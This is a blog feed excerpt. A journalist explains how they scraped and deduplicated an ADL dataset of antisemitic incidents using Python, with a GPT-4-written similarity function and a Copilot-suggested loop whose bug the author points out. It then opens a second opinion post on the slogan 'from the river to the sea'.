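```python
import difflib

# A real duplicate pair from the ADL data (they differ only in the
# question-marks-vs-quotes characters)
dup_a = 'An individual shouted "Long live Hamas" at a synagogue during Simchat Torah celebrations.'
dup_b = "An individual shouted ?Long live Hamas? at a synagogue during Simchat Torah celebrations."

# Two unrelated descriptions
not_a = "Swastika graffiti was left on the garage door of a home."
not_b = "Swastikas were spray-painted on a playground."

# ratio() returns a similarity score between 0.0 and 1.0
dup_ratio = difflib.SequenceMatcher(None, dup_a, dup_b).ratio()
not_ratio = difflib.SequenceMatcher(None, not_a, not_b).ratio()

print(f"duplicates:     {dup_ratio:.3f}")  # well above the 0.8 threshold
print(f"non-duplicates: {not_ratio:.3f}")  # well below it
```

The near-identical pair scores close to 1.0, while the unrelated pair falls far short of 0.8, which is why a single fixed threshold works for this dataset.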
<p>I then created a new script to test GPT-4's code, passing in these same examples of real duplicates and real non-duplicates to make sure it actually works as intended.</p>
<p>All of the following data, by the way, are actual antisemitic incidents tracked by ADL (note the stark difference between these and peace rallies organized by Jews demanding a ceasefire in Gaza).</p>
<p>Here's my test script:</p>
<div class="hll"><pre><span></span><span class="kn">import</span> <span class="nn">difflib</span>
<span class="k">def</span> <span class="nf">is_duplicate</span><span class="p">(</span><span class="n">row1</span><span class="p">,</span> <span class="n">row2</span><span class="p">):</span>
<span class="c1"># Check if any field other than 'Description' is different</span>
<span class="k">for</span> <span class="n">key</span> <span class="ow">in</span> <span class="n">row1</span><span class="p">:</span>
<span class="k">if</span> <span class="n">key</span> <span class="o">!=</span> <span class="s2">"Description"</span> <span class="ow">and</span> <span class="n">row1</span><span class="p">[</span><span class="n">key</span><span class="p">]</span> <span class="o">!=</span> <span class="n">row2</span><span class="p">[</span><span class="n">key</span><span class="p">]:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="c1"># Compare descriptions using a simple similarity measure</span>
<span class="n">similarity</span> <span class="o">=</span> <span class="n">difflib</span><span class="o">.</span><span class="n">SequenceMatcher</span><span class="p">(</span>
<span class="kc">None</span><span class="p">,</span> <span class="n">row1</span><span class="p">[</span><span class="s2">"Description"</span><span class="p">],</span> <span class="n">row2</span><span class="p">[</span><span class="s2">"Description"</span><span class="p">]</span>
<span class="p">)</span><span class="o">.</span><span class="n">ratio</span><span class="p">()</span>
<span class="c1"># Define a threshold for similarity (e.g., 0.8)</span>
<span class="n">threshold</span> <span class="o">=</span> <span class="mf">0.8</span>
<span class="k">return</span> <span class="n">similarity</span> <span class="o">>=</span> <span class="n">threshold</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"The following are real duplicates and should return True:"</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="n">is_duplicate</span><span class="p">(</span>
<span class="p">{</span>
<span class="s2">"Date of Incident"</span><span class="p">:</span> <span class="s2">"10/7/23"</span><span class="p">,</span>
<span class="s2">"Description"</span><span class="p">:</span> <span class="s1">'An individual shouted "Long live Hamas" at a synagogue during Simchat Torah celebrations.'</span><span class="p">,</span>
<span class="s2">"City"</span><span class="p">:</span> <span class="s2">"Clifton"</span><span class="p">,</span>
<span class="s2">"State"</span><span class="p">:</span> <span class="s2">"New Jersey"</span><span class="p">,</span>
<span class="s2">"Incident Type"</span><span class="p">:</span> <span class="s2">"Harassment"</span><span class="p">,</span>
<span class="p">},</span>
<span class="p">{</span>
<span class="s2">"Date of Incident"</span><span class="p">:</span> <span class="s2">"10/7/23"</span><span class="p">,</span>
<span class="s2">"Description"</span><span class="p">:</span> <span class="s2">"An individual shouted ?Long live Hamas? at a synagogue during Simchat Torah celebrations."</span><span class="p">,</span>
<span class="s2">"City"</span><span class="p">:</span> <span class="s2">"Clifton"</span><span class="p">,</span>
<span class="s2">"State"</span><span class="p">:</span> <span class="s2">"New Jersey"</span><span class="p">,</span>
<span class="s2">"Incident Type"</span><span class="p">:</span> <span class="s2">"Harassment"</span><span class="p">,</span>
<span class="p">},</span>
<span class="p">))</span>
<span class="nb">print</span><span class="p">(</span><span class="n">is_duplicate</span><span class="p">(</span>
<span class="p">{</span>
<span class="s2">"Date of Incident"</span><span class="p">:</span> <span class="s2">"10/7/23"</span><span class="p">,</span>
<span class="s2">"Description"</span><span class="p">:</span> <span class="s1">'After noticing two visibly Jewish people speaking Hebrew, an individual followed the victims and screamed "Allahu Akbar."'</span><span class="p">,</span>
<span class="s2">"City"</span><span class="p">:</span> <span class="s2">"Brooklyn"</span><span class="p">,</span>
<span class="s2">"State"</span><span class="p">:</span> <span class="s2">"New York"</span><span class="p">,</span>
<span class="s2">"Incident Type"</span><span class="p">:</span> <span class="s2">"Harassment"</span><span class="p">,</span>
<span class="p">},</span>
<span class="p">{</span>
<span class="s2">"Date of Incident"</span><span class="p">:</span> <span class="s2">"10/7/23"</span><span class="p">,</span>
<span class="s2">"Description"</span><span class="p">:</span> <span class="s1">'After noticing two visibly Jewish people speaking Hebrew, an individual followed the victims and screamed "Allahu Akbar" at them.'</span><span class="p">,</span>
<span class="s2">"City"</span><span class="p">:</span> <span class="s2">"Brooklyn"</span><span class="p">,</span>
<span class="s2">"State"</span><span class="p">:</span> <span class="s2">"New York"</span><span class="p">,</span>
<span class="s2">"Incident Type"</span><span class="p">:</span> <span class="s2">"Harassment"</span><span class="p">,</span>
<span class="p">},</span>
<span class="p">))</span>
<span class="nb">print</span><span class="p">(</span><span class="n">is_duplicate</span><span class="p">(</span>
<span class="p">{</span>
<span class="s2">"Date of Incident"</span><span class="p">:</span> <span class="s2">"10/8/23"</span><span class="p">,</span>
<span class="s2">"Description"</span><span class="p">:</span> <span class="s1">'During an anti-Israel rally, protestors made anti-Zionist comments such as "Zionism has got to go," praised violence against Israeli civilians and displayed antisemitic symbols including a swastika and the flag of Hamas.'</span><span class="p">,</span>
<span class="s2">"City"</span><span class="p">:</span> <span class="s2">"Manhattan"</span><span class="p">,</span>
<span class="s2">"State"</span><span class="p">:</span> <span class="s2">"New York"</span><span class="p">,</span>
<span class="s2">"Incident Type"</span><span class="p">:</span> <span class="s2">"Harassment"</span><span class="p">,</span>
<span class="p">},</span>
<span class="p">{</span>
<span class="s2">"Date of Incident"</span><span class="p">:</span> <span class="s2">"10/8/23"</span><span class="p">,</span>
<span class="s2">"Description"</span><span class="p">:</span> <span class="s1">'During an anti-Israel rally, protestors made anti-Zionist comments such as "Zionism has got to go," praised violence against Israeli civilians and displayed antisemitic symbols, including a swastika.'</span><span class="p">,</span>
<span class="s2">"City"</span><span class="p">:</span> <span class="s2">"Manhattan"</span><span class="p">,</span>
<span class="s2">"State"</span><span class="p">:</span> <span class="s2">"New York"</span><span class="p">,</span>
<span class="s2">"Incident Type"</span><span class="p">:</span> <span class="s2">"Harassment"</span><span class="p">,</span>
<span class="p">},</span>
<span class="p">))</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"The following are not duplicates and should return False:"</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="n">is_duplicate</span><span class="p">(</span>
<span class="p">{</span>
<span class="s2">"Date of Incident"</span><span class="p">:</span> <span class="s2">"10/8/23"</span><span class="p">,</span>
<span class="s2">"Description"</span><span class="p">:</span> <span class="s2">"Swastika graffiti was left on the garage door of a home."</span><span class="p">,</span>
<span class="s2">"City"</span><span class="p">:</span> <span class="s2">"St. Louis"</span><span class="p">,</span>
<span class="s2">"State"</span><span class="p">:</span> <span class="s2">"Missouri"</span><span class="p">,</span>
<span class="s2">"Incident Type"</span><span class="p">:</span> <span class="s2">"Vandalism"</span><span class="p">,</span>
<span class="p">},</span>
<span class="p">{</span>
<span class="s2">"Date of Incident"</span><span class="p">:</span> <span class="s2">"10/8/23"</span><span class="p">,</span>
<span class="s2">"Description"</span><span class="p">:</span> <span class="s2">"Swastikas were spray-painted on a playground."</span><span class="p">,</span>
<span class="s2">"City"</span><span class="p">:</span> <span class="s2">"St. Louis"</span><span class="p">,</span>
<span class="s2">"State"</span><span class="p">:</span> <span class="s2">"Missouri"</span><span class="p">,</span>
<span class="s2">"Incident Type"</span><span class="p">:</span> <span class="s2">"Vandalism"</span><span class="p">,</span>
<span class="p">},</span>
<span class="p">))</span>
<span class="nb">print</span><span class="p">(</span><span class="n">is_duplicate</span><span class="p">(</span>
<span class="p">{</span>
<span class="s2">"Date of Incident"</span><span class="p">:</span> <span class="s2">"10/8/23"</span><span class="p">,</span>
<span class="s2">"Description"</span><span class="p">:</span> <span class="s2">"An individual wearing a Nazi uniform entered a restaurant."</span><span class="p">,</span>
<span class="s2">"City"</span><span class="p">:</span> <span class="s2">"Fort Worth"</span><span class="p">,</span>
<span class="s2">"State"</span><span class="p">:</span> <span class="s2">"Texas"</span><span class="p">,</span>
<span class="s2">"Incident Type"</span><span class="p">:</span> <span class="s2">"Harassment"</span><span class="p">,</span>
<span class="p">},</span>
<span class="p">{</span>
<span class="s2">"Date of Incident"</span><span class="p">:</span> <span class="s2">"10/8/23"</span><span class="p">,</span>
<span class="s2">"Description"</span><span class="p">:</span> <span class="s2">"Extremist individuals distributed antisemitic propaganda the Fort Worth Botanic Garden."</span><span class="p">,</span>
<span class="s2">"City"</span><span class="p">:</span> <span class="s2">"Fort Worth"</span><span class="p">,</span>
<span class="s2">"State"</span><span class="p">:</span> <span class="s2">"Texas"</span><span class="p">,</span>
<span class="s2">"Incident Type"</span><span class="p">:</span> <span class="s2">"Harassment"</span><span class="p">,</span>
<span class="p">},</span>
<span class="p">))</span>
</pre></div>
<p>And here's what it looks like when I run this script:</p>
<pre><code>% python3 gpt4-test.py
The following are real duplicates and should return True:
True
True
True
The following are not duplicates and should return False:
False
False
</code></pre>
<p>The <code>is_duplicate()</code> function that GPT-4 wrote me appears to work. So I added it into my <code>extract-incidents.py</code> script.</p>
<p>Following the code that de-dupes exact matches, I wrote the following comment:</p>
<div class="hll"><pre><span></span><span class="c1"># Some of the rows are exact matches except they have different "Description" values.</span>
<span class="c1"># Use the is_duplicate function to dedupe these, keeping the row with the higher index.</span>
</pre></div>
<p>GitHub Copilot auto-suggested the following code to do the rest of the de-duping:</p>
<div class="hll"><pre><span></span><span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">row1</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">rows</span><span class="p">):</span>
<span class="k">for</span> <span class="n">j</span><span class="p">,</span> <span class="n">row2</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">rows</span><span class="p">):</span>
<span class="k">if</span> <span class="n">i</span> <span class="o"><</span> <span class="n">j</span><span class="p">:</span>
<span class="k">if</span> <span class="n">is_duplicate</span><span class="p">(</span><span class="n">row1</span><span class="p">,</span> <span class="n">row2</span><span class="p">):</span>
<span class="n">rows</span><span class="o">.</span><span class="n">pop</span><span class="p">(</span><span class="n">j</span><span class="p">)</span>
</pre></div>
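<p>One caution about this suggestion (a hedged sketch of my own, not code from the scripts in this post): calling <code>rows.pop(j)</code> while <code>enumerate()</code> is still walking the same list shifts later elements, so the loop skips the element right after each popped row and the counters drift away from real list positions. And because it pops the higher index <code>j</code>, it actually keeps the <em>lower</em>-index row, the opposite of what the comment asks for. A version that avoids in-place mutation and keeps the later copy could look like this:</p>

```python
import difflib


def is_duplicate(row1, row2):
    # Same logic as the GPT-4 function: every non-Description field
    # must match, and descriptions must be at least 80% similar
    for key in row1:
        if key != "Description" and row1[key] != row2[key]:
            return False
    similarity = difflib.SequenceMatcher(
        None, row1["Description"], row2["Description"]
    ).ratio()
    return similarity >= 0.8


def dedupe_similar(rows):
    # Keep only rows that have no near-duplicate later in the list,
    # so the later (higher-index, presumably corrected) copy survives
    return [
        row
        for i, row in enumerate(rows)
        if not any(is_duplicate(row, later) for later in rows[i + 1:])
    ]
```

In practice the in-place version produced plausible counts on this dataset, but the non-mutating form is easier to reason about and matches the stated intent of keeping the corrected row.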
<p>In all, here is my final <code>extract-incidents.py</code> file:</p>
<div class="hll"><pre><span></span><span class="kn">import</span> <span class="nn">json</span>
<span class="kn">import</span> <span class="nn">csv</span>
<span class="kn">import</span> <span class="nn">difflib</span>
<span class="k">def</span> <span class="nf">is_duplicate</span><span class="p">(</span><span class="n">row1</span><span class="p">,</span> <span class="n">row2</span><span class="p">):</span>
<span class="c1"># Check if any field other than 'Description' is different</span>
<span class="k">for</span> <span class="n">key</span> <span class="ow">in</span> <span class="n">row1</span><span class="p">:</span>
<span class="k">if</span> <span class="n">key</span> <span class="o">!=</span> <span class="s2">"Description"</span> <span class="ow">and</span> <span class="n">row1</span><span class="p">[</span><span class="n">key</span><span class="p">]</span> <span class="o">!=</span> <span class="n">row2</span><span class="p">[</span><span class="n">key</span><span class="p">]:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="c1"># Compare descriptions using a simple similarity measure</span>
<span class="n">similarity</span> <span class="o">=</span> <span class="n">difflib</span><span class="o">.</span><span class="n">SequenceMatcher</span><span class="p">(</span>
<span class="kc">None</span><span class="p">,</span> <span class="n">row1</span><span class="p">[</span><span class="s2">"Description"</span><span class="p">],</span> <span class="n">row2</span><span class="p">[</span><span class="s2">"Description"</span><span class="p">]</span>
<span class="p">)</span><span class="o">.</span><span class="n">ratio</span><span class="p">()</span>
<span class="c1"># Define a threshold for similarity (e.g., 0.8)</span>
<span class="n">threshold</span> <span class="o">=</span> <span class="mf">0.8</span>
<span class="k">return</span> <span class="n">similarity</span> <span class="o">>=</span> <span class="n">threshold</span>
<span class="k">def</span> <span class="nf">dedupe_exact_matches</span><span class="p">(</span><span class="n">items</span><span class="p">,</span> <span class="n">key</span><span class="p">):</span>
<span class="n">seen</span> <span class="o">=</span> <span class="nb">set</span><span class="p">()</span>
<span class="n">result</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">item</span> <span class="ow">in</span> <span class="n">items</span><span class="p">:</span>
<span class="n">val</span> <span class="o">=</span> <span class="nb">tuple</span><span class="p">(</span><span class="n">item</span><span class="p">[</span><span class="n">k</span><span class="p">]</span> <span class="k">for</span> <span class="n">k</span> <span class="ow">in</span> <span class="n">key</span><span class="p">)</span>
<span class="k">if</span> <span class="n">val</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">seen</span><span class="p">:</span>
<span class="n">seen</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">val</span><span class="p">)</span>
<span class="n">result</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">item</span><span class="p">)</span>
<span class="k">return</span> <span class="n">result</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
<span class="c1"># Load html from file</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s2">"map.html"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
<span class="n">html</span> <span class="o">=</span> <span class="n">f</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
<span class="c1"># Extract data from HTML</span>
<span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">html</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s2">"</span><span class="se">\n</span><span class="s2">"</span><span class="p">):</span>
<span class="k">if</span> <span class="s2">"_Flourish_data = "</span> <span class="ow">in</span> <span class="n">line</span><span class="p">:</span>
<span class="n">data_json</span> <span class="o">=</span> <span class="n">line</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">"_Flourish_data = "</span><span class="p">,</span> <span class="s2">""</span><span class="p">)</span>
<span class="n">data_json</span> <span class="o">=</span> <span class="n">data_json</span><span class="o">.</span><span class="n">strip</span><span class="p">()[:</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="c1"># strip trailing comma</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">json</span><span class="o">.</span><span class="n">loads</span><span class="p">(</span><span class="n">data_json</span><span class="p">)</span>
<span class="c1"># Save data points as CSV</span>
<span class="n">rows</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">headers</span> <span class="o">=</span> <span class="p">[</span>
<span class="s2">"Date of Incident"</span><span class="p">,</span>
<span class="s2">"Description"</span><span class="p">,</span>
<span class="s2">"City"</span><span class="p">,</span>
<span class="s2">"State"</span><span class="p">,</span>
<span class="s2">"Incident Type"</span><span class="p">,</span>
<span class="p">]</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s2">"adl-data.csv"</span><span class="p">,</span> <span class="s2">"w"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
<span class="n">writer</span> <span class="o">=</span> <span class="n">csv</span><span class="o">.</span><span class="n">DictWriter</span><span class="p">(</span><span class="n">f</span><span class="p">,</span> <span class="n">fieldnames</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span>
<span class="n">writer</span><span class="o">.</span><span class="n">writeheader</span><span class="p">()</span>
<span class="k">for</span> <span class="n">point</span> <span class="ow">in</span> <span class="n">data</span><span class="p">[</span><span class="s2">"points"</span><span class="p">]:</span>
<span class="n">row</span> <span class="o">=</span> <span class="p">{</span>
<span class="s2">"Date of Incident"</span><span class="p">:</span> <span class="n">point</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span>
<span class="s2">"Description"</span><span class="p">:</span> <span class="n">point</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">][</span><span class="mi">1</span><span class="p">],</span>
<span class="s2">"City"</span><span class="p">:</span> <span class="n">point</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">][</span><span class="mi">2</span><span class="p">],</span>
<span class="s2">"State"</span><span class="p">:</span> <span class="n">point</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">][</span><span class="mi">3</span><span class="p">],</span>
<span class="s2">"Incident Type"</span><span class="p">:</span> <span class="n">point</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">][</span><span class="mi">4</span><span class="p">],</span>
<span class="p">}</span>
<span class="n">rows</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">row</span><span class="p">)</span>
<span class="n">writer</span><span class="o">.</span><span class="n">writerow</span><span class="p">(</span><span class="n">row</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Number of rows: </span><span class="si">{</span><span class="nb">len</span><span class="p">(</span><span class="n">rows</span><span class="p">)</span><span class="si">}</span><span class="s2">"</span><span class="p">)</span>
<span class="c1"># Dedupe</span>
<span class="n">rows</span> <span class="o">=</span> <span class="n">dedupe_exact_matches</span><span class="p">(</span><span class="n">rows</span><span class="p">,</span> <span class="n">headers</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Number of rows after de-duping exact matches: </span><span class="si">{</span><span class="nb">len</span><span class="p">(</span><span class="n">rows</span><span class="p">)</span><span class="si">}</span><span class="s2">"</span><span class="p">)</span>
<span class="c1"># Some of the rows are exact matches except they have different "Description" values.</span>
<span class="c1"># Use the is_duplicate function to dedupe these, keeping the row with the higher index.</span>
<span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">row1</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">rows</span><span class="p">):</span>
<span class="k">for</span> <span class="n">j</span><span class="p">,</span> <span class="n">row2</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">rows</span><span class="p">):</span>
<span class="k">if</span> <span class="n">i</span> <span class="o"><</span> <span class="n">j</span><span class="p">:</span>
<span class="k">if</span> <span class="n">is_duplicate</span><span class="p">(</span><span class="n">row1</span><span class="p">,</span> <span class="n">row2</span><span class="p">):</span>
<span class="n">rows</span><span class="o">.</span><span class="n">pop</span><span class="p">(</span><span class="n">j</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Number of rows after de-duping similar descriptions: </span><span class="si">{</span><span class="nb">len</span><span class="p">(</span><span class="n">rows</span><span class="p">)</span><span class="si">}</span><span class="s2">"</span><span class="p">)</span>
<span class="c1"># Save the de-duped CSV</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s2">"adl-data-deduped.csv"</span><span class="p">,</span> <span class="s2">"w"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
<span class="n">writer</span> <span class="o">=</span> <span class="n">csv</span><span class="o">.</span><span class="n">DictWriter</span><span class="p">(</span><span class="n">f</span><span class="p">,</span> <span class="n">fieldnames</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span>
<span class="n">writer</span><span class="o">.</span><span class="n">writeheader</span><span class="p">()</span>
<span class="k">for</span> <span class="n">row</span> <span class="ow">in</span> <span class="n">rows</span><span class="p">:</span>
<span class="n">writer</span><span class="o">.</span><span class="n">writerow</span><span class="p">(</span><span class="n">row</span><span class="p">)</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">"__main__"</span><span class="p">:</span>
<span class="n">main</span><span class="p">()</span>
</pre></div>
<p>And here's what it looks like when I run it:</p>
<pre><code>% python3 extract-incidents.py
Number of rows: 1502
Number of rows after de-duping exact matches: 1263
Number of rows after de-duping similar descriptions: 1226
</code></pre>
<p>The final <code>adl-data-deduped.csv</code> spreadsheet contains 1,226 rows of data.</p>
<p>Note that this is more data than I had for <a href="https://theintercept.com/2023/11/11/palestine-israel-protests-ceasefire-antisemitic/">my article</a> in The Intercept -- when I pulled the data on November 9 for that article, the spreadsheet had 1,163 rows. In the four days since, ADL has added 63 rows to their public dataset -- but, due to their conflation of antisemitism and anti-Zionist peace activism, it's hard to immediately know whether the new data reflects neo-Nazis, Jewish social justice activists, or something else.</p>
<h2 id="counting-rows-in-the-spreadsheet-again">Counting rows in the spreadsheet again</h2><p>Now that I have a de-duped version of the spreadsheet, I have counted the rows one more time. Here's what I found:</p>
<ul>
<li>Anti-Israel Rally: 448 (36.5%)</li>
<li>Anti-Israel Rally w. Support for Terror: 170 (13.9%)</li>
<li>Assault: 30 (2.4%)</li>
<li>Harassment: 406 (33.1%)</li>
<li>Vandalism: 172 (14.0%)</li>
</ul>
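<p>This kind of tally is quick to reproduce with Python's <code>collections.Counter</code> -- a minimal sketch, using a small inline sample in place of the real <code>adl-data-deduped.csv</code> (the column headers match the script above):</p>

```python
import csv
import io
from collections import Counter

# Inline sample standing in for adl-data-deduped.csv; to run against
# the real file, replace io.StringIO(...) with open("adl-data-deduped.csv")
sample_csv = """Date of Incident,Description,City,State,Incident Type
10/7/23,Example one,Clifton,New Jersey,Harassment
10/8/23,Example two,Manhattan,New York,Anti-Israel Rally
10/8/23,Example three,St. Louis,Missouri,Vandalism
10/9/23,Example four,Brooklyn,New York,Harassment
"""

reader = csv.DictReader(io.StringIO(sample_csv))
counts = Counter(row["Incident Type"] for row in reader)
total = sum(counts.values())

# Print each incident type with its count and share of the total
for incident_type, count in sorted(counts.items()):
    print(f"{incident_type}: {count} ({count / total:.1%})")
```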
<p>If you're interested in what ADL means when they classify "anti-Israel rallies" as "with support for terror," go read my <a href="https://theintercept.com/2023/11/11/palestine-israel-protests-ceasefire-antisemitic/">original reporting</a>. ADL told me their criteria.</p>
<h2 id="the-rest-of-the-journalism">The rest of the journalism</h2><p>Extracting this data from ADL's online map -- what I've described in this blog post -- was just half of the work. The other half involved a lot of traditional investigative journalism work, including:</p>
<ul>
<li>Contacting ADL and asking them questions about their "antisemitic incidents and anti-Israel rallies" dataset, including specifically about their choice to include Jewish peace rallies.</li>
<li>Contacting organizers from the progressive Jewish groups IfNotNow and Jewish Voice for Peace to let them know that they're lumped in with hate groups by the ADL, and see what they have to say about it. Also, asking them for help identifying protests and direct actions around the US that were organized exclusively by Jews, or that were co-sponsored by Jews along with other groups.</li>
<li>Making a comprehensive list of social media accounts, mostly on Facebook, Instagram, and X, run by national and regional chapters of IfNotNow and Jewish Voice for Peace -- my list ended up containing 71 different accounts.</li>
<li>Scouring every single post, on every single social media account, since October 7 looking for "anti-Israel rallies" in the ADL dataset that were organized by Jews -- I spent at least a solid 8 hours doing this.</li>
</ul>
<p>I kept track of all of this in a spreadsheet, marking which rows were confirmed organized by Jews, along with links to social media posts showing the event flyers with Jewish orgs listed as co-sponsors, and other links to media from the Jewish-organized protests. Once I had collected this data, along with relevant quotes from ADL and Jewish activists, I sat down and wrote my article.</p>
<h2 id="hacks-leaks-and-revelations">Hacks, Leaks, and Revelations</h2><p>This particular ADL dataset is completely public. Everyone has access to it -- that is, everyone who has the right skills -- and it wasn't a hacked or leaked dataset. But the data was buried inside a web page, inaccessible to most people. The skills it takes to analyze this are exactly the same as the skills you need to analyze hacked and leaked datasets.</p>
<p>If you want to get good at this sort of work, check out my book <a href="https://hacksandleaks.com/"><em>Hacks, Leaks, and Revelations: The Art of Analyzing Hacked and Leaked Data</em></a>. I wrote this book for journalists, researchers, hacktivists, and anyone else who wants to learn the technologies and coding skills required to investigate hacked, leaked, and entirely public datasets like this one. While it gets pretty technical, it's written for beginners with no prior knowledge required.</p>
Why we shouldn't use the slogan "from the river to the sea"2023-11-05T00:00:00ZMicah Leeurn:uuid:f6aff607-800f-3754-b5ce-3e83cbe3b9cd<p><em>Update November 21, 2023:</em> Based on some conversations I've had, I want to make clear that I'm not at all advocating for ceding "from the river to the sea" to be an antisemitic phrase. <a href="https://jewishcurrents.org/what-does-from-the-river-to-the-sea-really-mean">It's not</a>. Almost all of the complaints about protesters, <a href="https://twitter.com/RepRashida/status/1721998463649431647">politicians</a>, or <a href="https://theintercept.com/2019/01/24/what-you-cant-say-about-israel-with-marc-lamont-hill/">journalists</a> saying "from the river to the sea" being antisemitic are made in bad faith, and those people should be called out for it. My argument is that, since the slogan has an ambiguous meaning, strategically it's much better for the public debate to be focused on the unfolding genocide in Gaza instead of on whether or not so-and-so is antisemitic because they said "from the river to the sea."</p>
<hr>
<p>In the 1970s, some wingnuts founded a UFO cult called Raëlism. It's an atheistic religion that believes that aliens called the Elohim created humanity on Earth using advanced technology. Raëlism was started in France but has since become an international cult. They proposed building an embassy for the Elohim, complete with a spaceship landing pad, in Israel. However, the Israeli government wasn't too keen on the idea because the Raëlism symbol includes a swastika in it -- a hate symbol most widely associated with Nazi Germany, though the symbol first originated in ancient religions like Hinduism in India.</p>
<p>Instead, the Raëlism cult got some land on Hawaii's Big Island to build their embassy, which is called the <a href="https://travel.nine.com.au/destinations/hawaii-visit-ufo-peace-park-owned-by-cult/1dc73c5a-44be-44b4-90d8-a32506fee055">UFO Peace Park</a>. The land is full of statues which represent Raëlism beliefs, and also the Raëlism symbol, which is a Star of David mixed with a swastika. Here's a photo from the UFO Peace Park of a woman, with the Raëlism symbol, doing a salute that looks suspiciously like a fascist salute.</p>
<p><img src="ufopeacepark.jpg" alt="UFO Peace Park">
<em>Photo credit: <a href="https://www.flickr.com/photos/radloffphotography/">Michael Radloff</a></em></p>
<p>In all likelihood, the Raëlists don't use the swastika in their symbol as a coded nod to Hitler. According to the <a href="https://en.wikipedia.org/wiki/Ra%C3%ABlism">Wikipedia article</a> (which cites books that I don't easily have access to), this symbol was used by the (obviously invented) Elohim aliens:</p>
<blockquote><p>The symbol initially used to signify Raëlism was a six-pointed star with a swastika in the centre. Raël stated that this was the symbol he originally saw on the hull of the Elohim's spaceship. Raëlians regard this as a symbol of infinity. Practitioners also believe that this symbol helps facilitate their own telepathic contact with the Elohim. Raëlists typically wear a medallion of the symbol around their neck.</p>
</blockquote>
<p>Still, I don't at all blame Israel for not wanting anything to do with swastikas.</p>
<p>I'm sure there are people that misguidedly use the swastika with the intent of invoking other meanings like "infinity," "conducive to well-being," or "prosperity and luck." But the meaning that's front-and-center in most people's minds is <em>the Nazi Party, the Holocaust, the systematic murder of six million Jews, and today's neo-Nazis who still use it</em>.</p>
<p>The swastika has multiple meanings: the symbol's meaning is <em>ambiguous</em>. But one of those meanings, and <em>by far</em> the most prominent, is <em>fascism and genocide</em>. If you're using a swastika and intend to actually have it mean something else, <em>people won't understand and will think you're a Nazi</em>.</p>
<p>And for good reason. I'm skeptical as hell of the motivations behind anyone who tries to use the swastika.</p>
<p>If you want a symbol that means infinity, use "♾️" or really <em>anything else that isn't literally synonymous with Nazism</em>. If you use the swastika, people will <em>definitely</em> misinterpret your meaning, will be skeptical of your insistence that you're not a Nazi, and at the very least will question your judgement for choosing to use an ambiguous symbol where one of its meanings is fascism and genocide.</p>
<p>Some people want to "reclaim" the swastika from the Nazis. But why? What's the point? And in any case, it's not going to work. People will always associate it with Nazism so anyone trying to reclaim it will be associated with Nazism too.</p>
<p>This brings me to the popular slogan in the Palestinian liberation movement, "from the river to the sea." Like the swastika, this slogan also has an ambiguous meaning -- though, in my opinion, it's not nearly as stark. "From the river to the sea" refers to the area of land west of the Jordan River and east of the Mediterranean Sea, which makes up the boundaries of Israel and the occupied Palestinian territories, the West Bank and the Gaza Strip.</p>
<p><img src="occupied-palestinian-territories.jpg" alt="Map of the occupied Palestinian territories from 2011"></p>
<p>The slogan has been used in the Palestinian liberation movement since the 1960s. It has multiple meanings:</p>
<ul>
<li>The slogan is used by human rights activists that want everyone in Israel/Palestine (Jews, Arabs, and everyone else) to have equal human rights, normally under a single secular democracy. This, I believe, is by far the most common use of the slogan.</li>
<li>It's used by Islamic extremists, like Hamas and Palestinian Islamic Jihad, who explicitly advocate for genocide against Jews, and for a religious fundamentalist government. <em>The slogan has been officially adopted by Hamas, which has promised to wipe out Israel</em>, and has stated, "Palestine is ours from the river to the sea and from the south to the north. There will be no concession on any inch of the land."</li>
<li>It's lesser known, but it has also been used by Jewish extremists. Benjamin Netanyahu's right-wing extremist political party, Likud, used the slogan "between the Sea and the Jordan there will only be Israeli sovereignty" as part of its <a href="https://www.jewishvirtuallibrary.org/original-party-platform-of-the-likud-party">1977 platform</a>. Netanyahu's government is currently engaged in a genocide against Palestinians in Gaza.</li>
</ul>
